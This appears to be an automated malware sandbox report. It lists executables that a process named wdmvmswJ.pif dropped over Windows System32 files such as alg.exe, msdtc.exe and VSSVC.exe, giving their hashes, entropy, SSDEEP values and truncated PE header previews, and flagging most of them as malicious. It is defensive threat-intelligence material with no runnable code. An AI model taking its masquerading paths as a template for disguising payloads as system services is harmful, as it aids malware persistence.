                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:250489E62A49BE6EDA69E6CCD2F02423
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C3F97964983ED887A3A3EF254EFAA8A6DD37FB20
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2832C84AB13502ED5BB63F6A9183EEEF505C114FC6125CD1D0FFB788FD639054
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2F0077BDC4F501688DDD99E546B99716F16F99796A893F2AA7F51D6396E7CC38B8A68D4719D3E95AE24E141B6704C104DAA823DED2C1EACCB4DE017EB5EF4C4E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................;.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.288989291598514
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:GkdpSI+K3S/GWei+qNv2uG3wsqjnhMgeiCl7G0nehbGZpbD:G6SIGGWei2uG3sDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:43FB9AC7ED234297B5E93DB791F8F5A8
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:ECCC5222C7845A1D9BA709D1C8DDE42BFB68CF28
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EC63FDFB2C642AF1301B3104A0878CB4A2953ACCD350A849EBD790AD3F5D337D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EDF7F54522D7A6D5BCC443A9E2DA2ECA7BD6D5F15A9E3FE2CE4D13C210FC63C84A843ABAF82916F6E5DF1777235627DBB9458C73937B24B82EF130E8DE4484F5
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P........... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\Locator.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1141248
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.01752530478114
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:oTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:525F4AE8B0B51CA29D93DB1875D48945
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1CB29CFCB6808C480945BCCDEDF98339D3BC8E60
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8D843CE5DD57760B2C0740CB5031902E5436CC53208C2C33F3F450084FD2DA07
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ABD6B90EC189B53FCD9C82C1CD7D4CA57EE28FA4E311261403489921A40BE84EA1366EDF35978B17405F9820FBCC8A231FB225B4A5F5A87E82A3D80523DDF07F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@....................................Y..... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3215220941777389
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:5FwATXl8ta/k/uMclF6vMclFq5zqzcksz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+O:oKl80kqF69Fq5zuco6CzE5Z2+fqjFDKn
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1D75098A1B940C83D94D8D13154BB680
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:64152F51D04D5D8E6D0CC28D244CAEE5E4767654
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:70120549EA4326B236255DB8A249DF109F7B9D26D2AC5089EEB1D18351699DB3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2B5C91CEE743D3F971276EFD5F75A3EDF27DD7C2B09E4FE37798CDBBEBD3367D24C232281A7DA211F84906DD3C44F3D26ED633D34ED7DF58AE4805CB28FEA79B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:.@..X...X.......................................X...!......................................e.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................D.f............-A..,..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P............e............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\OpenSSH\ssh-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1511424
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.222940865570856
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:bObHA4LWOsvAYFTIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:kjL3UTIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:350A23C304FAFA5EFD584F017610525E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EEF3DED50975A273D1FBCB84DDDF0F7451D8D935
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:90291A57299D12B2348E450EB505042770383125423668DB42B7E3E3B2CD4A71
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2F6C19661C6107D18CB6067E7BA989D13598CFFB66C259799426EEA9F6BE34E6CDF8356E56D4D4CAC2CE9CBDB29E92B9E870809D2051C7CE4FD354632580E952
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@.....................................i.... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1235968
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.182227606387444
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:GpFtQOkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:VOksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:083A7B3F7A1D4646EF789825E52C02AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3A81F7A8EA164FE214AABC17BE2B1EF58C020753
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DEDFE60EC7534367AD9A579A9B71075A8AC3CECA5DB7F8EA30017BE65738CC7D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:058938FFDFA243C8DC7E96B0883397AA8885D7D31EABA23E3BB05FAE722A30DC1298659BE74F04EA01344BACDA4927C841B3328CE46514CADAD00E11F7408FD5
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@.....................................p.... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.102433382465078
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:13frCoQItLsiLPLe24CxruW4bIhllIsqjnhMgeiCl7G0nehbGZpbD:13fzsIPLkCNuVbIhD0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:01670AF0E2D2C49A5B76BBA6148B4CF8
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0F4ED7B754F644DCEB4CEF66270E48DCF9DEDBC9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B6D7128C84CC47843CAE80F07D2F847ED294B3020F7BB15F56B1B18322209A68
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB8BC1D3D66AA363647F78BA4E5326617A0D00F0BCDED01EC722B4DEA5E0EBD97E3173C3BD85EB68397D79D115E29C79139449979EAEA188EB99BD98756740C7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.....................................#.... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\SensorDataService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1846784
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.939488439759572
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:YW6BApg2YuyuNDYTabvcRvNYf8km19sqjnhMgeiCl7G0nehbGZpbD:YF2YuHNETovcvNYf8kmLDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:78D3D3C671FAB25B9BF6149AD1D00F30
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BC648FBB182FAEA57D1A0B82EEC5C57E4E9D03E1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:620A1C22906331C6059A156CA5EC4DEF73F492A8433C92EDA83FDC15A9C8317E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3DB0D5276843DAF11B1869286B22E2DA5340531D2933685E4FBDBFF88C0F77842CF7BBC29595C46C5386BC8E7B3DCA9EC9202C0C7CD15357B049BA8CC41924D8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p......Vw.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\Spectrum.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1455616
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.238940032129324
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:RiW6ZvAKF5i/dN9Bdexj9Trk+FksqjnhMgeiCl7G0nehbGZpbD:RYxF50b9Bdm9TxSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:5B5A04180D3C1BE14C02BA823EFE4460
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:43A4D396AFCC4AEEF091F8E7CA8745D57984ECD9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:845588AEFFF13AB2C2406B7C1BF0F6038C13525D8213928BC730A92B15EFDBF7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2B426D4B1B3C2FD2A85AF9C1CB921E2EBBD0A1EE0A52A743CB9456C5CCD45CD6B42C23CD6463A3B60EE070F72EA638F50146FA14D357B8CB6C8A722894100F86
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@....................................y..... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\TieringEngineService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1455616
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.476616555522383
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:bJnJ5D3WYZsqjnhMgeiCl7G0nehbGZpbD:bJnJ5DGYdDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:27CBA905A592DFF909E560BF017D5B53
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CB77C3C826E4FFB8A6B4590CB03416C5BB25F11B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FA630D311024D7FF2DFBCB166FD17F4447F7DFAAF7FE1D0FACA14AAA48641528
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:987F0D9F79343FA2F90C676EB7D5C6CF0F0D2EA1D144B1F5201B8344956DC445794C075FB4A95127FE2DF5F8BD76BC36430ADD8E01E8CCE39B3C92AEFB7E95C7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.......................................... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\VSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2075136
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.736615937275442
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:DPK86JYTerDjfJ2313e1mP1MdnUeDmg27RnWGj:SD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:516BE630FCBECAF32B699CEB132A7E80
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9C3A1B95D0B48F6D6E1012C5F92E56A6774B094D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8277372EA0C973188EE212FF218736FE524B7602AFF229339B2165CFBDD9BF2C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6B66C9FEF0F2455B33D14C96202024AAF1C7745D2888C19EB06BAE6989F20065F33C7290B39CEABF955DAC77525F481852B88DFC66285169E806F1A902B5EE98
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ......K ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.163337410723834
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:TEP3R61Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Y61sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:C735DBF5B2240108A94A4D6FB664CF20
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EC618C58D58540E4752B3A4E3ADFDA62471DB693
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F56188F42C1068C02725F16A03B21B11CCE4B48C7294C7ED3E2BF69573C5B113
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1C455034DAE4D4332EA0AE91FA995079B1ACCB17089AEC35E548D9B1A5E9575F91BCBA264A196BA60CD6283AB81A6108C8C848458BC032CCD97DCAC476043042
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................!;.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.986302848115097
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:uRnUjm02s1Kb4sU08SHQS51yOmpghNPEUCyAs:uRoBm468gLyZOEUCy5
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:690FE012825EC10A3F29CBF2B475F168
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C379C65CC4493055941772DB386809B46E2DCF6C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A0AD4FFD94E0945C3399280D88C55BFC744D2F04C56FE1A23897226C5F84EF9F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5C7BF6ED130523418605DE9F18861681D9D5D367F3DE531E8BD647C84D8073D2C9FA9CB5D58E76A527508911CD87E6B084FF90CAE95361B814690116D88339F1
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:....`.P......IL....g.!.+..%.6..u...xmDw%...+ BX M...a9..q.wZ..V..3'.i)z.f...D-...l......`... ....K.@...c..~3.i....t....}.f.....%..@.nsC..CDHk..}.S:.......}...ux..vm-.ve.......Czr.y4.d...;.H..tdbn2..|!n.pc.z8..d.......;g.....kxL...nU.J.E...P..syj..2r...*8p.X...NU...y}.o.+@/ .~B..[5...H.....CN....{.o.&7.1$.B...u.eW[...........<....I.O..n.A.:*.u............XD:....3.G..9..r......'..V.9...."}m.7x....,J...m.D,xf..8...z..w....X.6z..u..).....3..t..... )................>Q...c..h.5.(`L5.C..W....P.+.'V.#.[...$r.@E.t]./;.......&..[]r.........3.f....B.{.rr`.e#...'.0q.r9t}.....Y...w..L.8...fo.|a.......M.......EA....Zib...:.zO.."D"..!V...b.%.bu..P......~..4...C...9t?nM....F..s..d..X..mA{h.c..I... 1...*~._2..>....yS1...t.:u..I.a.C....3.....{.....`..GF".&?A.H.y.d.#.#..............vC!.Q.VG....&.3...+.vf.F.b..Pj...i*e....w..4.....nT.".iRX.n^I.X...s...V..G....s3,A\.br.."3...o........+.....Bv9..>}..w].A.6.=..b......_k..@.'.....( .5.V.....i3.....e.Y.[

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\msdtc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1278464
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.142999227020195
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:rjkyOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rIyOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7C2A7829306AFD07E0A7BEE6B5203F55
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:120A5E296E8813186C1CBBC04886E55E651D7D84
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C633538A1704B93A5EB014C91C7ADA09A0A122989199FED1E2C74DC915D1510E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7B44CA384D31F8850F219345121EF8D3FC4487C1A31BAA596C15040AC91429A62110171FEB6E63F8355B4853F5BB6C2257BD079B70B619B5B6A75C857D658A13
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
